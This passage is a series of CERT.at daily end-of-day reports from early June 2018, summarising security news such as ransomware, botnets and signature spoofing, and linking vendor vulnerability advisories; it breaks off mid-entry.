=====================
= End-of-Day report =
=====================
Timeframe: Thursday 14-06-2018 18:00 - Friday 15-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote ∗∗∗
---------------------------------------------
Kaspersky Lab announced it was temporarily halting its cooperation with Europol following the vote on a controversial motion in the European Parliament today.
---------------------------------------------
https://www.bleepingcomputer.com/news/government/kaspersky-halts-europol-an…
∗∗∗ Decryptor Released for the Everbe Ransomware ∗∗∗
---------------------------------------------
A decryptor for the Everbe Ransomware was released by Michael Gillespie that allows victims to get their files back for free. It is not known how this ransomware is currently being distributed, but as long as victims have an unencrypted version of an encrypted file, they can use the pair to brute-force the decryption key.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-e…
∗∗∗ Mechanics Behind Ransomware-as-a-Service ∗∗∗
---------------------------------------------
Ransomware is an increasingly serious concern, and this problem is getting worse over time. Initially, this malware compromised fixed targets such as individuals, but the focus has since changed and become much broader, from individuals to organizations.
---------------------------------------------
https://resources.infosecinstitute.com/mechanics-behind-ransomware-as-a-ser…
∗∗∗ Old Botnets never Die, and DDG REFUSE to Fade Away ∗∗∗
---------------------------------------------
DDG is a mining botnet that specializes in exploiting SSH, Redis database and OrientDB database servers. We first caught it on October 25, 2017. At that time DDG used version numbers 2020 and 2021, and we noticed that the botnet has two internally reserved domain names that had not been [...]
---------------------------------------------
http://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-awa…
∗∗∗ Spectre-NG: Harsh criticism from OpenBSD developer Theo de Raadt ∗∗∗
---------------------------------------------
The publication of the most recent Spectre-NG bug was hastily brought forward after Theo de Raadt criticised Intel's information policy.
---------------------------------------------
http://heise.de/-4078903
∗∗∗ Downloaded 5 million times: Malicious Docker containers mine Monero ∗∗∗
---------------------------------------------
For ten months, backdoored Docker images were available via Docker Hub, even though those responsible had long since been informed about the malicious code.
---------------------------------------------
http://heise.de/-4079414
∗∗∗ Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1 ∗∗∗
---------------------------------------------
The McAfee Labs Advanced Threat Research team has been investigating the Windows 10 platform. We have submitted several vulnerabilities already and have disclosed our research to Microsoft. Please refer to our vulnerability disclosure policy for further details or the post from earlier this week on Windows 10 Cortana vulnerabilities.
---------------------------------------------
https://securingtomorrow.mcafee.com/mcafee-labs/unintended-clipboard-paste-…
∗∗∗ Fake Font Dropper ∗∗∗
---------------------------------------------
A website owner reached out to us to investigate a weird behavior on their site. It was randomly showing a popup window for a missing font and telling the visitors that they are unable to view the content of the site because their own computers are missing a required font by the website called "HoeflerText", [...]
---------------------------------------------
http://labs.sucuri.net/?note=2018-06-14
∗∗∗ Totally Pwning the Tapplock (the API way) ∗∗∗
---------------------------------------------
An awesome researcher contacted us on the back of our recent Tapplock pwnage. We had been looking at the local BLE unlock mechanism; however, he focused instead on the mobile app API. Vangelis Stykas (@evstykas) has found a way to unlock any lock, plus scrape users' PII and home addresses.
---------------------------------------------
https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-t…
=====================
= Vulnerabilities =
=====================
∗∗∗ Natus Xltek NeuroWorks ∗∗∗
---------------------------------------------
This medical device advisory includes mitigations for stack-based buffer overflow and out-of-bounds read vulnerabilities in the Natus Xltek NeuroWorks software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-18-165-01
∗∗∗ Siemens SCALANCE X Switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C ∗∗∗
---------------------------------------------
This advisory includes mitigation recommendations for a permissions, privileges, and access controls vulnerability reported in Siemens SCALANCE X switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-165-01
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (plexus-archiver), Fedora (chromium, kernel, and plexus-archiver), Mageia (firefox, gifsicle, jasper, leptonica, patch, perl-DBD-mysql, qt3, and scummvm), openSUSE (opencv), Oracle (kernel), Red Hat (kernel), Scientific Linux (kernel), SUSE (gpg2, nautilus, and postgresql96), and Ubuntu (gnupg2 and linux-raspi2).
---------------------------------------------
https://lwn.net/Articles/757610/
∗∗∗ Cisco IP Phone 7800 Series and 8800 Series Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ [R1] Nessus Agent 7.1.0 Fixes Multiple Third-party Vulnerabilities ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2018-09
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 13-06-2018 18:00 - Thursday 14-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ SigSpoof: Forging signatures with GnuPG ∗∗∗
---------------------------------------------
In certain situations, GnuPG's signature verification can be tricked in the plugins for Thunderbird and Apple Mail. The reason: status messages of the command-line tool can be forged via unfiltered output. However, the attack only works under very specific conditions. (GPG, E-Mail)
---------------------------------------------
https://www.golem.de/news/sigspoof-signaturen-faelschen-mit-gnupg-1806-1349…
∗∗∗ Lazy FPU: Intel's floating point unit can leak secret data ∗∗∗
---------------------------------------------
Registers of the floating point unit in Core i and presumably also some Xeon processors can reveal the results of confidential computations. However, this requires a local attack with malware, as well as an outdated operating system. (Intel, Amazon)
---------------------------------------------
https://www.golem.de/news/lazy-fpu-intels-floating-point-unit-kann-geheime-…
∗∗∗ Microsoft Reveals Which Bugs It Won’t Patch ∗∗∗
---------------------------------------------
A draft document lays out its criteria for addressing various flaws and notes the exceptions.
---------------------------------------------
https://threatpost.com/microsoft-reveals-which-bugs-it-wont-patch/132817/
∗∗∗ A Bunch of Compromised Wordpress Sites, (Wed, Jun 13th) ∗∗∗
---------------------------------------------
A few days ago, one of our readers contacted us and reported an incident affecting his website based on Wordpress. He performed quick checks by himself and found some pieces of evidence: [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/23764
∗∗∗ Tapplock Smart locks found to be physically and digitally vulnerable ∗∗∗
---------------------------------------------
Tapplock Smart locks contain several physical and digital vulnerabilities, each of which could allow an attacker to crack the lock with some attacks taking as little as two seconds to execute.
---------------------------------------------
https://www.scmagazine.com/tapplock-smart-locks-found-to-be-physically-and-…
∗∗∗ Malspam Campaigns Using IQY Attachments to Bypass AV Filters and Install RATs ∗∗∗
---------------------------------------------
Malspam campaigns, such as ones being distributed by Necurs, are utilizing a new attachment type that is doing a good job in bypassing antivirus and mail filters. These IQY attachments are called Excel Web Query files and when opened will attempt to pull data from external sources.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malspam-campaigns-using-iqy-…
∗∗∗ Mac malware can trick security tools ∗∗∗
---------------------------------------------
Using a purported Apple signature, malware is able to bypass well-known security tools. The problem has apparently existed for years.
---------------------------------------------
http://heise.de/-4077945
∗∗∗ Ecos Secure Boot Stick: Researchers warn of vulnerabilities ∗∗∗
---------------------------------------------
Tests of the SBS stick 5.6.5 and the system management software 5.2.68 revealed several attack points. Updates are available.
---------------------------------------------
http://heise.de/-4078344
∗∗∗ Malicious code via Git: Xcode update is meant to fix vulnerability ∗∗∗
---------------------------------------------
Apple has updated the development environment to close security holes. Git users should install the update promptly.
---------------------------------------------
http://heise.de/-4078821
∗∗∗ New CryptoMiner hijacks your Bitcoin transaction. Over 300,000 computers have been attacked. ∗∗∗
---------------------------------------------
Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account [...]
---------------------------------------------
https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-t…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium and gnupg), Debian (spip), Fedora (pdns-recursor), Gentoo (adobe-flash, burp, quassel, and wget), openSUSE (bouncycastle and taglib), Oracle (kernel), SUSE (java-1_7_0-openjdk, java-1_8_0-openjdk, poppler, and samba), and Ubuntu (file, perl, and ruby1.9.1, ruby2.0, ruby2.3).
---------------------------------------------
https://lwn.net/Articles/757531/
∗∗∗ Custom Tokens - Critical - Arbitrary PHP code execution - SA-CONTRIB-2018-041 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2018-041
∗∗∗ OpenSSL, Libgcrypt, LibreSSL: Two vulnerabilities allow, among other things, a denial-of-service attack ∗∗∗
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-1138/
https://www.openssl.org/news/secadv/20180612.txt
∗∗∗ Enigmail: Two vulnerabilities allow, among other things, bypassing security measures ∗∗∗
---------------------------------------------
https://adv-archiv.dfn-cert.de/adv/2018-1155/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Algo Credit Manager ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22017118
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM® SPSS Statistics Server ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016900
∗∗∗ IBM Security Bulletin: A privilege escalation vulnerability in nzhwinfo that affects IBM Netezza Platform Software clients. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22015701
∗∗∗ IBM Security Bulletin: Vulnerability in IBM HTTP Server affects Netezza Performance Portal ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016809
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition affect IBM Virtualization Engine TS7700 – October 2017, January 2018 and April 2018 ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012379
∗∗∗ IBM Security Bulletin: IBM WebSphere Cast Iron Solution is affected by Tomcat vulnerabilities ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22017032
∗∗∗ SigSpoof: Spoofing signatures in GnuPG, Enigmail, GPGTools and python-gnupg (CVE-2018-12020) ∗∗∗
---------------------------------------------
https://neopg.io/blog/gpg-signature-spoof/
∗∗∗ SigSpoof 2: More ways to spoof signatures in GnuPG (CVE-2018-12019) ∗∗∗
---------------------------------------------
https://neopg.io/blog/enigmail-signature-spoof/
∗∗∗ SigSpoof 3: Breaking signature verification in pass (Simple Password Store) (CVE-2018-12356) ∗∗∗
---------------------------------------------
https://neopg.io/blog/pass-signature-spoof/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 12-06-2018 18:00 - Wednesday 13-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ June 2018 Security Update Release ∗∗∗
---------------------------------------------
Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information about this month’s ..
---------------------------------------------
https://blogs.technet.microsoft.com/msrc/2018/06/12/june-2018-security-upda…
∗∗∗ Windows NTFS tricks by and for pentesters ∗∗∗
---------------------------------------------
The SEC Consult Vulnerability Lab has published a new blog post presenting various NTFS file system tricks. These were collected from various sources over recent years or discovered and further developed by the SEC Consult Vulnerability Lab. The tricks lead ..
---------------------------------------------
https://www.sec-consult.com/blog/2018/06/windows-ntfs-tricks-von-und-fuer-p…
∗∗∗ Subtle change could see a reduction in installation of malicious Chrome extensions ∗∗∗
---------------------------------------------
Google has made a subtle change to its Chrome browser, banning the inline installation of new extensions, thus ..
---------------------------------------------
https://www.virusbulletin.com:443/blog/2018/06/subtle-change-could-see-redu…
∗∗∗ Feds Bust Dozens of Nigerian Email Scammers, but Your Inbox Still Isn’t Safe ∗∗∗
---------------------------------------------
The arrest of dozens of alleged Nigerian email scammers and their associates is a small, but important, ..
---------------------------------------------
https://www.wired.com/story/feds-bust-nigerian-email-scammers
∗∗∗ Patch Tuesday: Microsoft fixes 50 security vulnerabilities ∗∗∗
---------------------------------------------
Many Windows versions contain, among others, a critical hole in the DNS programming interface. Security updates are available.
---------------------------------------------
http://heise.de/-4077270
∗∗∗ "Trik" botnet: C&C server leaks millions of e-mail addresses ∗∗∗
---------------------------------------------
A researcher has come across a spammer database containing more than 43 million e-mail addresses. It is still unclear how many of them had already been leaked before.
---------------------------------------------
http://heise.de/-4077371
∗∗∗ Exploit kits: Spring 2018 review ∗∗∗
---------------------------------------------
In this Spring 2018 snapshot, we review the top exploit kits ..
---------------------------------------------
https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-r…
∗∗∗ June 2018 Office Update Release ∗∗∗
---------------------------------------------
The June 2018 Public Update releases for Office are now available! This month, there ..
---------------------------------------------
https://blogs.technet.microsoft.com/office_sustained_engineering/2018/06/12…
=====================
= Vulnerabilities =
=====================
∗∗∗ HPESBHF03850 rev.1 - HPE ProLiant, Synergy, and Moonshot Systems: Local Disclosure of Information, CVE-2018-3639 – Speculative Store Bypass and CVE-2018-3640 – Rogue System Register Read ∗∗∗
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
∗∗∗ Schneider Electric U.motion Builder ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-163-01
∗∗∗ Siemens SCALANCE X Switches ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-163-02
∗∗∗ Local File Inclusion vulnerability in Zenphoto ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN33124193/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 11-06-2018 18:00 - Tuesday 12-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Unprotected Server Exposes Weight Watchers Internal IT Infrastructure ∗∗∗
---------------------------------------------
Researchers found that a critical Weight Watchers server revealed its internal IT infrastructure.
---------------------------------------------
https://threatpost.com/unprotected-server-exposes-weight-watchers-internal-…
∗∗∗ Hacker raids Linuxforums.org and steals data of 276,000 accounts ∗∗∗
---------------------------------------------
An unknown attacker gained access to the internals of Linuxforums.org and copied user data including passwords.
---------------------------------------------
http://heise.de/-4076540
∗∗∗ Android malware mines cryptocurrency on Fire TV devices ∗∗∗
---------------------------------------------
Stuttering video streams and strange white pop-ups can be signs of a malware infection on Fire TV and Fire TV Sticks.
---------------------------------------------
http://heise.de/-4076706
∗∗∗ IT-Security - Security fail: OnePlus 6 not protected against modified firmware ∗∗∗
---------------------------------------------
Even with a locked bootloader, an arbitrary image can be transferred to the device; the manufacturer has announced a patch.
---------------------------------------------
https://derstandard.at/2000081439178/Security-Fail-OnePlus-6-nicht-gegen-mo…
∗∗∗ IT-Security - Handed out at the Trump-Kim summit: Espionage concerns over USB fans ∗∗∗
---------------------------------------------
Because of the heat, bags containing USB fans and water were handed out; the fans could be infected with malware.
---------------------------------------------
https://derstandard.at/2000081443928/Bei-Trump-Kim-Gipfel-verteilt-Bedenken…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco WebEx Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web framework of the https://try.webex.com page of Cisco WebEx could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of an affected system. The vulnerability is due to insufficient input validation of certain parameters that are passed to the affected ..
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ VMSA-2018-0015 - VMware AirWatch Agent updates resolve remote code execution vulnerability. ∗∗∗
---------------------------------------------
The VMware AirWatch Agent for Android and Windows Mobile devices contains a remote code execution vulnerability in its real-time File Manager capabilities. This vulnerability may allow for unauthorized creation and execution of ..
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2018-0015.html
=====================
= End-of-Day report =
=====================
Timeframe: Friday 08-06-2018 18:00 - Monday 11-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Chile: SWIFT attack hidden behind wiper malware ∗∗∗
---------------------------------------------
When a company is attacked with ransomware, it is not always about extortion. In an attack on Banco de Chile, the software was reportedly used primarily as a distraction.
---------------------------------------------
https://www.golem.de/news/chile-swift-angriff-hinter-wiper-malware-versteck…
∗∗∗ Lenovo Finally Patches Ancient BlueBorne Bugs in Tab and Yoga Tablets ∗∗∗
---------------------------------------------
Lenovo patches several popular tablet models to protect against BlueBorne vulnerabilities first identified in September 2017.
---------------------------------------------
https://threatpost.com/lenovo-finally-patches-ancient-blueborne-bugs-in-tab…
∗∗∗ Paper: EternalBlue: a prominent threat actor of 2017–2018 ∗∗∗
---------------------------------------------
We publish a paper by researchers from Quick Heal Security Labs in India, who study the EternalBlue and DoublePulsar exploits in full detail.
---------------------------------------------
https://www.virusbulletin.com:443/blog/2018/06/paper-eternalblue-prominent-…
∗∗∗ Encryption: GnuPG tightens integrity checks ∗∗∗
---------------------------------------------
As a consequence of the Efail problems, GnuPG 2.2.8 now enforces the use of integrity check codes. The update also fixes a newly discovered security problem.
---------------------------------------------
http://heise.de/-4075908
∗∗∗ Magento CC stealer reinfector ∗∗∗
---------------------------------------------
We have seen many times in the past few months how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, but we haven’t ..
---------------------------------------------
http://labs.sucuri.net/?note=2018-06-08
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-4225 openjdk-7 - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2018/dsa-4225
∗∗∗ DSA-4220 firefox-esr - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2018/dsa-4220
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 07-06-2018 18:00 - Friday 08-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Gitea: Account of Github alternative briefly taken over ∗∗∗
---------------------------------------------
The Gitea project develops a lightweight open-source alternative to Github. A bot account of the project on Github has now apparently been taken over briefly in order to distribute cryptominers. Source code and infrastructure are said not to be affected.
---------------------------------------------
https://www.golem.de/news/gitea-account-von-github-alternative-kurzzeitig-u…
∗∗∗ Adobe: Flash exploit is being distributed via Office documents ∗∗∗
---------------------------------------------
Flash exploits are now increasingly distributed via Office documents because browsers hardly display the content any more. In a current case, users in the Arab region are being attacked.
---------------------------------------------
https://www.golem.de/news/adobe-flash-exploit-wird-ueber-office-dokumente-v…
∗∗∗ Combination of three vulnerabilities breaks Foscam IP cameras ∗∗∗
---------------------------------------------
There are important security updates for various Foscam IP cameras.
---------------------------------------------
http://heise.de/-4074308
=====================
= Vulnerabilities =
=====================
∗∗∗ Rockwell Automation RSLinx Classic and FactoryTalk Linx Gateway ∗∗∗
---------------------------------------------
This advisory contains mitigation recommendations for an unquoted
search path or element vulnerability in the Rockwell Automation RSLinx
Classic software platform.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-158-01
∗∗∗ Update: "Zero-Day" vulnerability in Adobe Flash Player - actively exploited - patches available ∗∗∗
---------------------------------------------
Update: "Zero-Day" vulnerability in Adobe Flash Player - actively exploited - patches available. 7 June 2018; updated 8 June 2018.
Description: Adobe has announced that there is currently a critical vulnerability in Adobe Flash Player that is already being actively exploited. CVE number: CVE-2018-5002.
Update 8 June 2018: CVE numbers: CVE-2018-4945, CVE-2018-5000, CVE-2018-5001, CVE-2018-5002.
Adobe has released a corresponding update [...]
---------------------------------------------
http://www.cert.at/warnings/all/20180607.html
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (radare2), Debian
(jruby), Fedora (elfutils and wireless-tools), openSUSE (glibc,
mariadb, and xdg-utils), Oracle (kernel), Red Hat (chromium-browser and
java-1.7.1-ibm), SUSE (ceph, icu, kernel-firmware, memcached, and xen),
and Ubuntu (unbound).
---------------------------------------------
https://lwn.net/Articles/756950/
∗∗∗ Security vulnerabilities fixed in Firefox 60.0.2, ESR 60.0.2, and ESR 52.8.1 ∗∗∗
---------------------------------------------
critical - CVE-2018-6126: Heap buffer overflow rasterizing paths in SVG
with Skia
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2018-14/
∗∗∗ Synology-SA-17:79 SRM ∗∗∗
---------------------------------------------
This vulnerability allows remote authenticated users to execute
arbitrary code via a susceptible version of Synology Router Manager
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_17_79
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 06-06-2018 18:00 - Thursday 07-06-2018 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Prowli Malware Targeting Servers, Routers, and IoT Devices ∗∗∗
---------------------------------------------
After the discovery of the massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world. Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code ...
---------------------------------------------
https://thehackernews.com/2018/06/prowli-malware-botnet.html
∗∗∗ Crappy IoT on the high seas: Holes punched in hull of maritime security ∗∗∗
---------------------------------------------
Researchers: We can nudge ships off course. Infosec Europe: Years-old security issues mostly stamped out in enterprise technology remain in maritime environments, leaving ships vulnerable to hacking, tracking, and worse.
---------------------------------------------
https://www.theregister.co.uk/2018/06/06/infosec_europe_maritime_security/
∗∗∗ Cyber Europe 2018 – Get prepared for the next cyber crisis ∗∗∗
---------------------------------------------
EU Cybersecurity Agency ENISA organised an international cybersecurity exercise
---------------------------------------------
https://www.enisa.europa.eu/news/enisa-news/cyber-europe-2018-get-prepared-…
∗∗∗ Retefe check ∗∗∗
---------------------------------------------
Check if your computer is infected with the Retefe banking trojan.
---------------------------------------------
http://retefe-check.ch/
∗∗∗ A Totally Tubular Treatise on TRITON and TriStation ∗∗∗
---------------------------------------------
In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what was necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatis…
∗∗∗ Security updates: Critical vulnerabilities in Cisco IOS and Prime ∗∗∗
---------------------------------------------
Various Cisco network devices and network software contain vulnerabilities, some of them critical. Affected admins should install the available patches promptly.
---------------------------------------------
http://heise.de/-4072861
=====================
= Vulnerabilities =
=====================
∗∗∗ "Zero-Day" vulnerability in Adobe Flash Player - actively exploited - patches available ∗∗∗
---------------------------------------------
"Zero-Day" vulnerability in Adobe Flash Player - actively exploited - patches available. 7 June 2018.
Description: Adobe has announced that there is currently a critical vulnerability in Adobe Flash Player that is already being actively exploited. CVE number: CVE-2018-5002. Adobe has published a corresponding update; details are available at https://helpx.adobe.com/security/products/flash-player/apsb18-19.html.
---------------------------------------------
http://www.cert.at/warnings/all/20180607.html
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (memcached), Fedora (java-1.8.0-openjdk-aarch32, sqlite, and xen), Mageia (corosync, gimp, qtpass, and SDL_image), openSUSE (zziplib), Slackware (mozilla), SUSE (git and libvorbis), and Ubuntu (liblouis).
---------------------------------------------
https://lwn.net/Articles/756853/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Protect Snapshot (formerly Tivoli Storage FlashCopy Manager) for VMware (CVE-2018-2579, CVE-2018-2602, CVE-2018-2603, CVE-2018-2633, CVE-2018-2783) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016041
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Protect (formerly Tivoli Storage Manager) for Virtual Environments: Data Protection for Hyper-V ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016028
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities have been fixed in IBM Security Identity Manager ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22013617
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the IBM GSKit component of IBM Spectrum Protect (formerly Tivoli Storage Manager) for Virtual Environments: Data Protection for Hyper-V ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22015304
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 05-06-2018 18:00 − Wednesday 06-06-2018 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Sofacy Group’s Parallel Attacks ∗∗∗
---------------------------------------------
Unit 42’s continued look at the Sofacy Group’s activity reveals the persistent targeting of government, diplomatic and other strategic organizations across North America and Europe.
---------------------------------------------
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-pa…
∗∗∗ Converting PCAP Web Traffic to Apache Log ∗∗∗
---------------------------------------------
PCAP data can be really useful when you must investigate an incident but when the amount of PCAP files to analyse is counted in gigabytes, it may quickly become tricky to handle. Often, the first protocol to be analysed is HTTP because it remains a classic infection or communication vector used by malware. What if you could analyze HTTP connections like an Apache access log? This kind of log can be easily indexed/processed by many tools.
---------------------------------------------
https://isc.sans.edu/diary/rss/23739
∗∗∗ Researchers warn widespread Google Group misconfigurations are exposing sensitive data ∗∗∗
---------------------------------------------
A survey of 2.5 million domains looked for configurations publicly exposed, found 9,637 exposed organizations, then used a random sample of 171 public organizations to determine nearly 3,000 domains were leaking sensitive data.
---------------------------------------------
https://www.scmagazine.com/researchers-find-widespread-google-group-misconf…
∗∗∗ VPNFilter Update - VPNFilter exploits endpoints, targets new devices ∗∗∗
---------------------------------------------
Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding "VPNFilter." In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints.
---------------------------------------------
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html
∗∗∗ Zip Slip vulnerability: malicious code comes included when unpacking ∗∗∗
---------------------------------------------
Many coding libraries are vulnerable when unpacking archives. If an attack succeeds, malicious code could end up on computers.
---------------------------------------------
http://heise.de/-4070792
∗∗∗ Warning about anenberg.store ∗∗∗
---------------------------------------------
On anenberg.store consumers find graphics cards and crypto miners. We advise against buying from this vendor, because it shows irregularities. Internet users warn against ordering; the prices are in part very low, and payment for the goods is only possible in advance.
---------------------------------------------
https://www.watchlist-internet.at/news/warnung-vor-anenbergstore/
∗∗∗ Counterfeit brand alert on backpacks.at! ∗∗∗
---------------------------------------------
On backpacks.at consumers find shoes and bags from brands such as Michael Kors, Tamaris, Buffalo or Ralph Lauren. The prices are extremely low and are meant to tempt a quick purchase. The .at domain suggests an Austrian company, but the shop is actually operated from Asia, delivered goods do not match what was ordered, and a withdrawal is hopeless.
---------------------------------------------
https://www.watchlist-internet.at/news/markenfaelscher-alarm-auf-backpacksa…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (git), Fedora (php-symfony, php-symfony4, and thunderbird-enigmail), Mageia (glpi and libreoffice), openSUSE (dpdk-thunderxdpdk, git, and ocaml), SUSE (glibc, libvorbis, and zziplib), and Ubuntu (elfutils, git, and procps).
---------------------------------------------
https://lwn.net/Articles/756761/
∗∗∗ Philips IntelliVue Patient and Avalon Fetal Monitors ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-18-156-01
∗∗∗ ABB IP Gateway ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-18-156-01
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Internet Pass Thru ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016280
∗∗∗ IBM Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Tivoli Storage Manager FastBack (CVE-2018-2602) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016679
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Protect (Tivoli Storage Manager) Windows and Macintosh Client (CVE-2018-2603, CVE-2018-2633) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016042
∗∗∗ IBM Security Bulletin: Apache Commons FileUpload vulnerability affects IBM Spectrum Protect Plus (CVE-2016-1000031) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22016826
∗∗∗ IBM Security Bulletin: IBM MQ Appliance is affected by an OpenSSL vulnerability ( CVE-2017-3736) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22016116
=====================
= End-of-Day report =
=====================
Timeframe: Monday 04-06-2018 18:00 − Tuesday 05-06-2018 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit ∗∗∗
---------------------------------------------
Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security ..
---------------------------------------------
https://thehackernews.com/2018/06/drupalgeddon2-exploit.html
∗∗∗ IoT Botnets Found Using Default Credentials for C&C Server Databases ∗∗∗
---------------------------------------------
